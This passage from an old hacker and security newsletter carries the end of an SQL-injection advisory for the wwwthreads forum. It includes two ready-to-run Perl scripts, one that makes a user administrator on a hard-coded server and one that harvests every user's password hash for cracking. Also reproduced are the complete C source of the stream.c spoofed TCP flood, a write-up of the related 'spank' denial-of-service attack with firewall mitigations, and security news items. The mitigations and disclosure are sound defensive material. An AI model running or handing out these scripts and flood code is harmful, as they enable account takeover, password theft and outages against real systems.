spot...changeprofile.pl. This is the script that takes data entered in editprofile.pl and enters the changes into the database. Of course, the profile is our user profile. This means to use this, we need a valid user account. In any event, let's have a look-see... # Format the query words my $Password_q = $dbh -> quote($Password); my $Email_q = $dbh -> quote($Email); my $Fakeemail_q = $dbh -> quote($Fakeemail); my $Name_q = $dbh -> quote($Name); my $Signature_q = $dbh -> quote($Signature); my $Homepage_q = $dbh -> quote($Homepage); my $Occupation_q = $dbh -> quote($Occupation); my $Hobbies_q = $dbh -> quote($Hobbies); my $Location_q = $dbh -> quote($Location); my $Bio_q = $dbh -> quote($Bio); my $Username_q = $dbh -> quote($Username); my $Display_q = $dbh -> quote($Display); my $View_q = $dbh -> quote($View); my $EReplies_q = $dbh -> quote($EReplies); my $Notify_q = $dbh -> quote($Notify); my $FontSize_q = $dbh -> quote($FontSize); my $FontFace_q = $dbh -> quote($FontFace); my $ICQ_q = $dbh -> quote($ICQ); my $Post_Format_q= $dbh -> quote($Post_Format); my $Preview_q = $dbh -> quote($Preview); Ack! Practically everything is quoted! That means all those parameters are useless to us. And lets peek at the final actual query that sticks all our information back into the database # Update the User's profile my $query =qq! UPDATE Users SET Password = $Password_q, Email = $Email_q, Fakeemail = $Fakeemail_q, Name = $Name_q, Signature = $Signature_q, Homepage = $Homepage_q, Occupation = $Occupation_q, Hobbies = $Hobbies_q, Location = $Location_q, Bio = $Bio_q, Sort = $Sort, Display = $Display_q, View = $View_q, PostsPer = $PostsPer, EReplies = $EReplies_q, Notify = $Notify_q, TextCols = $TextCols, TextRows = $TextRows, FontSize = $FontSize_q, FontFace = $FontFace_q, Extra1 = $ICQ_q, Post_Format = $Post_Format_q, Preview = $Preview_q WHERE Username = $Username_q !; Since wwwthreads nicely slaps the '_q' on the variables, it's easy to see. See it? $Sort, $PostsPer, $TextCols, and $TextRows aren't quoted. Now, let's figure out where that data comes from my $Sort = $FORM{'sort_order'}; my $PostsPer = $FORM{'PostsPer'}; my $TextCols = $FORM{'TextCols'}; my $TextRows = $FORM{'TextRows'}; Wow, they're taken straight from the submitted form data. That means they are not checked or validated in any way. Here's our chance! Going back to structure of the user record (given above), there's a 'Status' field we need to change. Looking in this UPDATE query, Status isn't listed. So this means that the Status field is going to remain unchanged. Bummer. See what we're going to do yet? Take a second and think about it. Remember, all of this hinges around the fact that we want to submit what looks like data, but in the end, the SQL engine/database will interpret it differently. Notice in the query that the fields are listed in the format of field=value, field=value, field=value, etc (of course, they're on separate lines). If I were to insert some fake values (for the sake of example), I might have Name='rfp', Signature='rfp', Homepage='www.wiretrip.net/rfp/' All I did was put the fields on the same line, collapse the whitespace, and fill in the (quoted) string values. This is valid SQL. Now, let's put this all together. Looking at the the 'Sort' variable (which is numeric), we would feasibly have Bio='puppy', Sort=5, Display='threaded' which is still valid SQL. Since $Sort=$FORM{'sort_order'}, that means the above value for Sort was given by submitting the parameter sort_order=5. Now, let's use Sort to our advantage. What if we were to include a comma, and then some more column values? Oh, say, the Status field? Let's set the sort_order parameter to "5, Status='Administrator',", and then let it run its course. Eventually we'll get a query that looks like Bio='puppy', Sort=5, Status='Administrator', Display='threaded' ^^^^^^^^^^^^^^^^^^^^^^^^^^ our submitted data This is still valid SQL! And furthermore, it will cause the database to update the Status field to be 'Administrator'! But remember when we looked in adduser.pl, the first user had a Security level of 100. We want that to, so we just set the sort_order parameter to "5, Status='Administrator', Security=100,", and then we get Bio='puppy', Sort=5, Status='Administrator', Security=100, ... which updates both values to what we want. The database not knowing any better will update those two fields, and now the forums will think we're an administrator. So I go to apply this new technique on PacketStorm...and get a 404 for requests to changeprofile.pl. Yep, the pro version doesn't have it. Navigating the 'Edit Profile' menu, I see that it has 'Basic Profile', 'Display Preferences', and 'Email Notifications/Subscriptions', which the demo does not (it's all lumped together). Wonderful. If they changed the scripts around, they may have also changed the SQL queries (well they had to, actually). So now we're in 'blackbox' mode (blindly making educated guesses on what's going on). Since we want to play with the sort_order parameter still, you'll see that it's contained in the 'Display Preferences' script (editdisplay.pl). This script handles the sort_order, display, view, PostPer, Post_Format, Preview, TextCols, TextRows, FontSize, FontFace, PictureView, and PicturePost (gained by viewing the HTML source). So it's a subset of the parameters. Using the above code snippets, we can guess at what the SQL query looking like. So why not give it a shot. First I poke some invalid values into sort_order (characters instead of numbers). This causes an error, which I figured. Since, in the first example how the fields where 'B_' for the 'Board' table, the 'User' table (which we are now using) prefixes colums with a 'U_'. So that means we need to use 'U_Status' and 'U_Security' for field names. Good thing we checked. Since this needs to be a valid form submit, we need to submit values for all of the listed variables. At this point I should also point out (again) we need a valid user account of which to increase the status. We'll need the username and password (hash), which are printed as hidden form elements on various forms (like editdisplay.pl). You'll see the parameters are Username and Oldpass. So based on all of this, we can construct a URL that looks like changedisplay.pl? Cat=& Username=rfp &Oldpass=(valid password hash) &sort_order=5,U_Status%3d'Administrator',U_Security%3d100 &display=threaded &view=collapsed &PostsPer=10 &Post_Format=top &Preview=on &TextCols=60 &TextRows=5 &FontSize=0 &FontFace= &PictureView=on &PicturePost=off The important one of course being &sort_order=5,U_Status%3d'Administrator',U_Security%3d100 which is just an escaped version of what we used above (the %3d translate to the '=' character). When you lump it all together into a single string, you get changedisplay.pl?Cat=&Username=rfp&Oldpass=(valid password hash) &sort_order=5,U_Status%3d'Administrator',U_Security%3d100&display=threaded &view=collapsed&PostsPer=10&Post_Format=top&Preview=on&TextCols=60 &TextRows=5&FontSize=0&FontFace=&PictureView=on&PicturePost=off which, while gross, is what it needs to be. So, I submit this to PacketStorm, and get Your display preferences have been modified. Wonderful. But, noticing on the top menu, I see an 'Admin' option now. I click it, and what do I see but the heart warming message of As an Administrator the following options are available to you. Bingo! Administrator privileges! Looking at my options, I can edit users, boards, or forums, assign moderators and administrators, ban users/hosts, expire/close/open threads, etc. Now for our second objective...the passwords. I go into 'Show/Edit Users', and am asked to pick the first letter of the usernames I'm interested in. So I pick 'R'. At list of all 'R*' users comes up. I click on 'rfp'. And there we go, my password hash. Unfortunately, there's no nice and easy way to dump all users and their hashes. Bummer. So I automated a perl script to do it for me, and dump the output in a format that can be fed into John the Ripper. ----[ 3. Solution Now, how to defend against this? As you saw, the reason this worked was due to non-restricted data being passed straight into SQL queries. Luckily wwwthreads quoted (most) string data, but they didn't touch numeric data. The solution is to make sure numeric data is indeed numeric. You can do it the 'silent' way by using a function like so sub onlynumbers { ($data=shift)=~tr/0-9//cd; return $data;} And similar to how all string data is passed through DBI->quote(), pass all numeric data through onlynumbers(). So, for the above example, it would be better to use my $Sort = onlynumbers($FORM{'sort_order'}); Another area that needs to be verified is the table name. In our very first example, we had 'Board=general'. As you see here, a table name is not quoted like a string. Therefore we also need to run all table names through a function to clean them up as well. Assuming table names can have letters, numbers, and periods, we can scrub it with sub scrubtable { ($data=shift)=~tr/a-zA-Z0-9.//cd; return $data;} which will remove all other cruft. In the end, *all* (let me repeat that... **ALL**) incoming user data should be passed through quote(), onlynumbers(), or scrubtable()...NO EXCEPTIONS! Passing user data straight into a SQL query is asking for someone to tamper with your database. New versions of wwwthreads are available from www.wwwthreads.com, which implement the solutions pretty much as I've described them here. ----[ 4. Conclusion I've included two scripts below. wwwthreads.pl will run the query for you against a pro version of wwwthreads. You just have to give the ip address of the server running wwwthreads, and a valid user and password hash. w3tpass.pl will walk and download all wwwthreads user password hashes, and give output suitable for password cracking with John the Ripper. Thanks to PacketStorm for being a good sport about this. - Rain Forest Puppy / rfp@wiretrip.net - I feel a rant coming on... ----[ 5. Included perl scripts -[ wwwthreads.pl #!/usr/bin/perl # wwwthreads hack by rfp@wiretrip.net # elevate a user to admin status # # by rain forest puppy / rfp@wiretrip.net use Socket; ##################################################### # modify these # can be DNS or IP address $ip="209.143.242.119"; $username="rfp"; # remember to put a '\' before the '$' characters $passhash="\$1\$V2\$sadklfjasdkfhjaskdjflh"; ##################################################### $parms="Cat=&Username=$username&Oldpass=$passhash". "&sort_order=5,U_Status%3d'Administrator',U_Security%3d100". "&display=threaded&view=collapsed&PostsPer=10". "&Post_Format=top&Preview=on&TextCols=60&TextRows=5&FontSize=0". "&FontFace=&PictureView=on&PicturePost=off"; $tosend="GET /cgi-bin/wwwthreads/changedisplay.pl?$parms HTTP/1.0\r\n". "Referer: http://$ip/cgi-bin/wwwthreads/previewpost.pl\r\n\r\n"; print sendraw($tosend); sub sendraw { my ($pstr)=@_; my $target; $target= inet_aton($ip) || die("inet_aton problems"); socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,80,$target)){ select(S); $|=1; print $pstr; my @in=<S>; select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); }} -[ w3tpass.pl #!/usr/bin/perl # download all wwwthread usernames/passwords once you're administrator # send a fake cookie with authenciation and fake the referer # initial passwords are 6 chars long, contain a-zA-Z0-9 EXCEPT l,O,1 # # by rain forest puppy / rfp@wiretrip.net use Socket; ##################################################### # modify these # can be DNS or IP address $ip="209.143.242.119"; $username="rfp"; # remember to put a '\' before the '$' characters $passhash="\$1\$V2\$zxcvzxvczxcvzxvczxcv"; ##################################################### @letts=split(//,'0ABCDEFGHIJKLMNOPQRSTUVWXYZ'); print STDERR "wwwthreads password snatcher by rain forest puppy\r\n"; print STDERR "Getting initial user lists..."; foreach $let (@letts){ $parms="Cat=&Start=$let"; $tosend="GET /cgi-bin/wwwthreads/admin/showusers.pl?$parms HTTP/1.0\r\n". "Referer: http://$ip/cgi-bin/wwwthreads/\r\n". "Cookie: Username=$username; Password=$passhash\r\n\r\n"; my @D=sendraw($tosend); foreach $line (@D){ if($line=~/showoneuser\.pl\?User=([^"]+)\"\>/){ push @users, $1;}}} $usercount=@users; print STDERR "$usercount users retrieved.\r\n". "Fetching individual passwords...\r\n"; foreach $user (@users){ $parms="User=$user"; $tosend="GET /cgi-bin/wwwthreads/admin/showoneuser.pl?$parms HTTP/1.0\r\n". "Referer: http://$ip/cgi-bin/wwwthreads/\r\n". "Cookie: Username=$username; Password=$passhash\r\n\r\n"; my @D=sendraw($tosend); foreach $line (@D){ if($line=~/OldPass value = "([^"]+)"/){ ($pass=$1)=~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; $user =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; print $user.':'.$pass."::::::::::\n"; last;}}} print STDERR "done.\r\n\r\n"; sub sendraw { my ($pstr)=@_; my $target; $target= inet_aton($ip) || die("inet_aton problems"); socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,80,$target)){ select(S); $|=1; print $pstr; my @in=<S>; select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); }} # Greets to everyone who hasn't used RDS to deface a website (small crowd) --- rain forest puppy / rfp@wiretrip.net ------------- ADM / wiretrip --- SQL hacking has many ins, many outs; there's many levels of complexity... --- Advisory RFP2K01 ------------------------------ rfp.labs ------------ _____________________________________________________________________ ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice" ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST" SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net @HWA 13.0 The stream.c exploit ~~~~~~~~~~~~~~~~~~~~ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <strings.h> #include <sys/time.h> #include <sys/types.h> #include <sys/socket.h> #ifndef __USE_BSD #define __USE_BSD #endif #ifndef __FAVOR_BSD #define __FAVOR_BSD #endif #include <netinet/in_systm.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include <arpa/inet.h> #include <netdb.h> #ifdef LINUX #define FIX(x) htons(x) #else #define FIX(x) (x) #endif struct ip_hdr { u_int ip_hl:4, /* header length in 32 bit words */ ip_v:4; /* ip version */ u_char ip_tos; /* type of service */ u_short ip_len; /* total packet length */ u_short ip_id; /* identification */ u_short ip_off; /* fragment offset */ u_char ip_ttl; /* time to live */ u_char ip_p; /* protocol */ u_short ip_sum; /* ip checksum */ u_long saddr, daddr; /* source and dest address */ }; struct tcp_hdr { u_short th_sport; /* source port */ u_short th_dport; /* destination port */ u_long th_seq; /* sequence number */ u_long th_ack; /* acknowledgement number */ u_int th_x2:4, /* unused */ th_off:4; /* data offset */ u_char th_flags; /* flags field */ u_short th_win; /* window size */ u_short th_sum; /* tcp checksum */ u_short th_urp; /* urgent pointer */ }; struct tcpopt_hdr { u_char type; /* type */ u_char len; /* length */ u_short value; /* value */ }; struct pseudo_hdr { /* See RFC 793 Pseudo Header */ u_long saddr, daddr; /* source and dest address */ u_char mbz, ptcl; /* zero and protocol */ u_short tcpl; /* tcp length */ }; struct packet { struct ip/*_hdr*/ ip; struct tcphdr tcp; /* struct tcpopt_hdr opt; */ }; struct cksum { struct pseudo_hdr pseudo; struct tcphdr tcp; }; struct packet packet; struct cksum cksum; struct sockaddr_in s_in; u_short dstport, pktsize, pps; u_long dstaddr; int sock; void usage(char *progname) { fprintf(stderr, "Usage: %s <dstaddr> <dstport> <pktsize> <pps>\n", progname); fprintf(stderr, " dstaddr - the target we are trying to attack.\n"); fprintf(stderr, " dstport - the port of the target, 0 = random.\n"); fprintf(stderr, " pktsize - the extra size to use. 0 = normal syn.\n"); exit(1); } /* This is a reference internet checksum implimentation, not very fast */ inline u_short in_cksum(u_short *addr, int len) { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *)(&answer) = *(u_char *) w; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return(answer); } u_long lookup(char *hostname) { struct hostent *hp; if ((hp = gethostbyname(hostname)) == NULL) { fprintf(stderr, "Could not resolve %s.\n", hostname); exit(1); } return *(u_long *)hp->h_addr; } void flooder(void) { struct timespec ts; int i; memset(&packet, 0, sizeof(packet)); ts.tv_sec = 0; ts.tv_nsec = 10; packet.ip.ip_hl = 5; packet.ip.ip_v = 4; packet.ip.ip_p = IPPROTO_TCP; packet.ip.ip_tos = 0x08; packet.ip.ip_id = rand(); packet.ip.ip_len = FIX(sizeof(packet)); packet.ip.ip_off = 0; /* IP_DF? */ packet.ip.ip_ttl = 255; packet.ip.ip_dst.s_addr = random(); packet.tcp.th_flags = 0; packet.tcp.th_win = htons(16384); packet.tcp.th_seq = random(); packet.tcp.th_ack = 0; packet.tcp.th_off = 5; /* 5 */ packet.tcp.th_urp = 0; packet.tcp.th_dport = dstport?htons(dstport):rand(); /* packet.opt.type = 0x02; packet.opt.len = 0x04; packet.opt.value = htons(1460); */ cksum.pseudo.daddr = dstaddr; cksum.pseudo.mbz = 0; cksum.pseudo.ptcl = IPPROTO_TCP; cksum.pseudo.tcpl = htons(sizeof(struct tcphdr)); s_in.sin_family = AF_INET; s_in.sin_addr.s_addr = dstaddr; s_in.sin_port = packet.tcp.th_dport; for(i=0;;++i) { /* patched by 3APA3A to send 1 syn packet + 1023 ACK packets. */ if( !(i&0x4FF) ) { packet.tcp.th_sport = rand(); cksum.pseudo.saddr = packet.ip.ip_src.s_addr = random(); packet.tcp.th_flags = TH_SYN; packet.tcp.th_ack = 0; } else { packet.tcp.th_flags = TH_ACK; packet.tcp.th_ack = random(); } /* cksum.pseudo.saddr = packet.ip.ip_src.s_addr = random(); */ ++packet.ip.ip_id; /*++packet.tcp.th_sport*/; ++packet.tcp.th_seq; if (!dstport) s_in.sin_port = packet.tcp.th_dport = rand(); packet.ip.ip_sum = 0; packet.tcp.th_sum = 0; cksum.tcp = packet.tcp; packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20); packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof(cksum)); if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) perror("jess"); } } int main(int argc, char *argv[]) { int on = 1; printf("stream.c v1.0 - TCP Packet Storm\n"); if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("socket"); exit(1); } setgid(getgid()); setuid(getuid()); if (argc < 4) usage(argv[0]); if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) { perror("setsockopt"); exit(1); } srand((time(NULL) ^ getpid()) + getppid()); printf("\nResolving IPs..."); fflush(stdout); dstaddr = lookup(argv[1]); dstport = atoi(argv[2]); pktsize = atoi(argv[3]); printf("Sending..."); fflush(stdout); flooder(); return 0; } @HWA 14.0 Spank, variation of the stream.c DoS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ------------------------------------------------ Explanation of the 'spank' attack -- a new breed stream/raped ------------------------------------------------ By: lst (yardley@uiuc.edu) This is a tad different than the previous release. Stream/Raped mearly flooded the host with ack's (or no flags) and came from random ips with random sequence numbers and/or ack numbers. The difference now is that this not only does the previous stuff, but also directly attacks from and to multicast addresses as well. Just as before, rate limiting should be done to counteract its effect (the same idea as ICMP_BANDLIM). The multicast handling should also be checked to verify that it is behaving properly. The attacker specifies the port[s] that they want to send the attack to, depending on what ports are selected, you will have different net results. If the port is an open port, then you will possibly have a longer kernel path to follow before the drop. Therefore, a smart attacker will hit open ports, but havoc can also come about from random ports due to states and processing. In the best case scenario, you will experience only the lag of the flood and the lag of the processing (currently) and then be fine when the attacker stops, In the worst case, you lockup, kill the network, and possibly have to reboot. Once you patch it, you deal with a lot less processing time (the drops are handled without the RST flag when appropriate--bandlim type idea). In other words, you go to the drop routine instead of dropwithrst silencing your response, which decreases your processing time, the hit on your network, and the effect of the flood (once a threshold is reached, all those bad packets are silently dropped and the attack has less of a net effect). The filters that were presented at the beginning of this email will block all multicast packets that come out (and in) the tcp stack I have been getting mailed a lot about this. Here is why I said the previous statement. Receiving a packet with no flags is considered an illegal packet (obviously) and is often dumped, however, as we have seen in the past, illegal packets often wreak havoc and often go untested. There is very little that "raped.c" or "stream.c" actually showed as problems in the TCP/IP stacks. The true problem lies more in the effects of the response (caused by the attack). This is the same concept as the SYN floods of yesteryear, and the same type of thing will be done to handle it. The main difference is that it will be on a simpler note because there isn't much need for a "cookie" based system. One should just throttle the response of the reset packets which in turn will help stop the storm that you generate and in general, harden the tcp/ip stack to behave the way it is supposed to. The main effect of this attack is that you are shooting back RST+ACK's at all the spoofed hosts. Obviously, a lot of these hosts will not exist and you will get ICMP unreaches (as an example) bounced back at you. There are other possibilities as well, but unreach would be the most common (redirects might be common as well although i did not spend the time to analyze that). The ones that don't respond back may send you some packets back as well (depending on if the port was valid or not and what their firewall rules are). This type of attack is complicated by the multicasts, and the effect is amplified as well. All in all, it becomes very nasty very quick. Basically, this causes a nice little storm of packets, in the ideal case. Note that I said ideal case in the previous paragraph. This is not always the observed behavior. It all depends on what is on the subnet, what type of packets are recieved, what rules and filters you have setup, and even the duration of the flood. It has been pointed out several times that the machine will go back to normal once the attack is stopped, which is exactly why something like ICMP_BANDLIM will work. I have also been asked a lot about what this "bug" affects. I have seen it have effects on *BSD, Linux, Solaris, and Win* as far as OS's go. It has also seemed to affect some hubs, switches, routers, or gateways since entire subnets have "disappeared" briefly after the attack. The multicast attack seems to be more deadly to teh network than the previous attack and its affects get amplified and even carried over to the rest of the network (bypassing secluded network bounds). I don't have more specifics on the systems affected because of the difficulty in testing it (and keeping the network up) since I do not have local access to the networks that I tested on, and remote access gets real ugly real fast. Another possibility that has been suggested as to why some machines die is that the machine's route table is being blown up by the spoofed packets. Each spoofed packet has a different source address which means that a temporary route table entry is being created for each one. These entries take time to timeout. Use 'vmstat -m' and check the 'routetbl' field while the attack is going on. Route table entries can be controlled somewhat under freebsd with: [root@solid]::[~] sysctl -a | fgrep .rt net.inet.ip.rtexpire: 3600 net.inet.ip.rtminexpire: 10 net.inet.ip.rtmaxcache: 128 You can do the following, to help if the route table is at least part of the problem: sysctl -w net.inet.ip.rtexpire=2 sysctl -w net.inet.ip.rtminexpire=2 Things that will help: 1. Drop all multicast packets (ingress and egress) that are addressed to the tcp stack because multicasts are not valid for tcp. 2. Extend bandwidth limiting to include RST's, ACK's and anything else that you feel could affect the stability of the machine. 3. Don't look for listening sockets if the packet is not a syn I hope that this helps, or explains a little more at least. --------------------------------------------------- Temporary remedy --------------------------------------------------- If you use ipfilter, this MAY help you, but the issue is quite a bit different than the previous issue. -- start rule set -- block in quick proto tcp from any to any head 100 block in quick proto tcp from 224.0.0.0/28 to any group 100 pass in quick proto tcp from any to any flags S keep state group 100 pass out proto tcp from any to any flags S keep state pass in all -- end rule set -- optionally, a rule like the following could be inserted to handle outgoing packets (if they send from the firewall somehow) but you have bigger problems than the attack if that is the case. -- start additional rule -- block out proto tcp from any to 224.0.0.0/28 -- end additional rule -- That will help you "stop" the attack (actually it will just help minimize the affects), although it will still use some CPU though Note: If you use IPFW, there is no immediate way to solve this problem due to the fact that it is a stateless firewall. If you are getting attacked, then temporarily use ipfilter (or any other state based firewall) to stop it. Otherwise, wait for vendor patches or read more about the explanation for other possible workarounds. FreeBSD "unofficial patch" by Don Lewis: http://solid.ncsa.uiuc.edu/~liquid/patch/don_lewis_tcp.diff ----------------------- Conclusion ----------------------- This bug was found in testing. It seems a bit more lethal than the previous and should be addressed as such. Patches should be available now, but I do not follow all the platforms. -------------------- References -------------------- This was done independantly, although some of the analysis and reverse engineering of concept was done by other people. As a result, I would like to give credit where credit is due. The following people contributed in some way or another: Brett Glass <brett@lariat.org> Alfred Perlstein <bright@wintelcom.net> Warner Losh <imp@village.org> Darren Reed <avalon@coombs.anu.edu.au> Don Lewis <Don.Lewis@tsc.tdk.com> Also, I would like to send shouts out to w00w00 (http://www.w00w00.org) ------------------- Attached ------------------- These programs are for the sake of full disclosure, don't abuse them. Spank was written with libnet, so you will need to obtain that as well. You can find that at http://www.packetfactory.net/libnet For an "unofficial" patch: http://www.w00w00.org/files/spank/don_lewis_tcp.diff For spank.c: http://www.w00w00.org/files/spank/spank.c @HWA 15.0 Canadian Security Conference announcement: CanSecWest. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Canc0n may have failed as the first security/hacker con in Canada so here is a promising sounding event pulled off by professional boys. CanSecWest/core00 April, 19th, 20th, 21st, 2000 Vancouver, BC, Canada. "Every IT/Security person who can attend, should attend.CanSecWest/core00 promises to be the hardest hitting, most informative, and useful network security event ever held in Canada." Website: http://www.dursec.com/ Some high profile speakers are scheduled to appear: Noted speakers include: Ron Gula - Network Security Wizards Famous ex-U.S. government computer security analyst, who founded Network Security Wizards and authored the Dragon intrusion detection system. Ron will discuss intrusion detection sensors, drawing upon his large base of practical experience in the area. Ken Williams - Ernst & Young The creator of famous hacker super-site: packetstorm.securify.com. The infamous "tattooman" from genocide2600 now of Ernst&Young's security team will give some pointers on NT security. Marty Roesch - www.hiverworld.com Author of the popular "snort" intrusion detection system and senior software engineer on Hiverworld's "ARMOR" intrusion detection system. He will talk about good ways to "snort" out intruders. rain.forest.puppy - www.wiretrip.net Famous security paper author - one of those "he could take over the internet if he felt like it" kind of guys will amaze and amuse with some 0 day exploit training. Theo DeRaadt - OpenBSD The leader of the OpenBSD Secure operating system project will talk about securing operating systems. Fyodor - www.insecure.org Author of the award winning Nmap Security Scanner. He also maintains the popular Insecure.Org web site, the "Exploit World" vulnerability database, and several seminal papers describing techniques for stealth port scanning and OS detection via TCP/IP stack fingerprinting. Fyodor will demonstrate the use of Nmap to identify subtle security vulnerabilities in a network. Max Vision - www.maxvision.net - - www.whitehats.com Security consultant and author of the popular ArachNIDS (www.whitehats.com) public intrusion signature database will discuss intrusion forensics, attack fakes, attacker verification, and retaliation. Dragos Ruiu - dursec.com Tutorial author, founder of NETSentry Technology, former MPEG and ATM expert for HP and dursec.com founder; Dragos will be giving the first day's training. Dragos has instructed tens of thousands of people about digital video and high speed computer networks in highly rated HP training courses delivered in over 60 cities world-wide. A long-time security expert and instructor, his course material will explain this intricate subject through approachable explanations with applications and real-world examples that will help you apply this important knowledge to your computers immediately. @HWA 16.0 Security Portal review Jan 16th ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ******* Vendor Corner ******* Entrust - We Bring Trust to e-Business Entrust Technologies lets you tap into new global e-business markets by securing applications for Web, e-mail, ERP, VPN, desktop files and folders, as well as a comprehensive suite of solutions to deliver trusted e-business transactions to the exploding wireless Internet appliance market. For more information on this complete range of security solutions for e-business visit http://www.entrust.com <http://www.entrust.com> . Come see us at RSA 2000, San Jose, CA, Jan.16-20, 2000, San Jose McEnery Convention Center, Booth #416. ******* What's new with SecurityPortal.com ******* Linux vs Microsoft: Who solves security problems faster? Does Open Source plug security holes quickly? We took a look at the security advisories issued by Microsoft and Red Hat in 1999 to gauge the time lag between the point of a "general community awareness" of a security problem and the point at which a patch was released. Find out who won here. <http://securityportal.com/direct.cgi?/cover/coverstory20000117.html> SecurityPortal.com is proud to sponsor Techno-Security 2000 April 16-19, 2000 Wyndham Myrtle Beach Resort Myrtle Beach, South Carolina This one-of-a-kind conference is intended for private industry, government, law enforcement decision makers and technical experts interested in, or involved with information security, operations security, high tech crime and its prevention. Featured speakers include: Bill Murray, Dr. Dorothy Denning, Bill Crowell, Chris Goggans, Kevin Manson, Rick Forno, Dr. Myron Cramer, Don Delaney, Dr. Terry Gudaitis, Matt Devost and many more... This year's high intensity tracks will include: Hacker Profiling, Intrusion Detection, Beginner & Advance Computer Forensics, e-Commerce Security, Body Armor for Cyber-Cops, Information Terrorism, Live Vulnerability Testing, Incident Response, Tools for Protecting the Enterprise, PKI, plus many more. Registration is available on-line at: www.TheTrainingCo.com <http://www.TheTrainingCo.com> or call 410.703.0332 for more information. ******* Vendor Corner ******* Sponsored by Trend Micro, Inc. http://www.antivirus.com <http://www.antivirus.com> . ScanMail for Lotus Notes is a native Domino server application. - First product to provide complete, scaleable virus protection for Lotus Notes. - Detects and removes viruses hidden in databases and email attachments. - Provides real-time scanning of incoming and outgoing emails through the Domino server. - Infection notification and provides a Virus Activity Report to assist in tracing and securing virus point entry. - Multi-threaded architecture delivers high performance. - SmartScan eliminates redundant scanning to maximize server efficiency. ******* Top News ******* January 17, 2000 Welcome to SecurityPortal.com - The focal point for security on the Net. Biggest news of last week was probably the new encryption export regulations released by the U.S. We will let you know when our lawyers get through them. Recent postings in our top news <http://www.securityportal.com/framesettopnews.html> : Jan 17, 2000 MSNBC: Microsoft certificate bug crashes Netscape browser <http://msnbc.com/news/357775.asp> - IIS 4 does not correctly support 56-bit certificates, so when Communicator tries to step up to the highest level of security (128-bit key length certificates), it simply crashes with an invalid page fault in NETSCAPE.EXE ZDNet: Computer glitch gives Canadian Microsoft Web site <http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2422989,00.html?chkpt=p 1bn> - a glitch at Network Solutions briefly gave a Canadian ownership of Microsoft.com and Yahoo.com over the weekend Jan 15, 2000 ABCNews: Online Credit Hacker May Be Out for Profit <http://www.apbnews.com/newscenter/internetcrime/2000/01/14/hack0114_01.html > - While a computer hacker maintains that he stole credit card numbers from an online retailer as revenge for poor service and a couple of broken CDs, a security expert believes that Maxus is actually a two-man team in Russia engaged in a well-organized credit card fraud FCW: FBI beefs up cyberagent squads nationwide <http://www.fcw.com/fcw/articles/web-fbi-01-14-00.asp> - The FBI plans to reinforce its mission to counter cyberattacks with the formation of new investigative teams specializing in computer intrusions and attacks at all 56 of its field offices around the country. The agency also plans to assign at least one computer forensics examiner to each field office ZDNet: Network Associates divides itself <http://www.zdnet.com/zdnn/stories/news/0,4586,2422403,00.html?chkpt=zdnntop > - Convinced that six smaller companies can compete better than one big one, Network Associates gives up on its integrated security strategy ZDNet: How to steal 2,500 credit cards <http://www.zdnet.com/zdnn/stories/news/0,4586,2422687,00.html?chkpt=zdnntop > - Just how easy is it to steal credit card numbers on the Internet? On Thursday, MSNBC was able to view nearly 2,500 credit card numbers stored by seven small e-commerce Web sites within a few minutes, using elementary instructions provided by a source. In all cases, a list of customers and all their personal information was connected to the Internet and either was not password-protected or the password was viewable directly from the Web site Jan 14, 2000 IDG: U.S., EU to meet on data privacy <http://www.idg.net/idgns/2000/01/14/USEUToMeetOnData.shtml> - The U.S. government has invited representatives from European Union countries to Washington D.C. next week to work out an agreement on data privacy before their self-imposed March deadline CNet: Security software firm Tripwire plans Linux push <http://news.cnet.com/news/0-1003-200-1522536.html?dtn.head> - Security software maker Tripwire is planning to unveil a major expansion into new types of computing products, especially those running on the Linux operating system ZDNet: Crypto compromise a lawyers' delight <http://www.zdnet.com/zdnn/stories/news/0,4586,2422348,00.html?chkpt=zdhpnew s01> - It's supposed to make ease encryption export controls. But have the Clinton Administration's new regs instead created a legal maze? CA: COMPUTER ASSOCIATES WARNS OF A NEW VARIANT OF THE NEWAPT WORM CALLED NEWAPTd <http://www.ca.com/press/2000/01/newapt_d.htm> - Computer Associates International, Inc. yesterday warned computer users of a worm called "NewApt.D," a new variant belonging to the NewApt family of Win32 worms. The worm uses e-mail and executable attachments to propagate from one computer to another. This worm has been reported in the wild. The original NewApt worm was first detected in December 1999 Jan 13, 2000 CA: Virus Alert: COMPUTER ASSOCIATES DISCOVERS A NEW WORM CALLED Plage2000 <http://www.ca.com/press/2000/01/plage2000.htm> - Computer Associates International, Inc. today warned computer users of a new worm called Plage2000 which could threaten computer email systems as well as eBusiness infrastructures. This worm has been reported to be in the wild by CA customers. CA's antivirus research team is analyzing this worm and will provide more details as they are determined InternetNews: 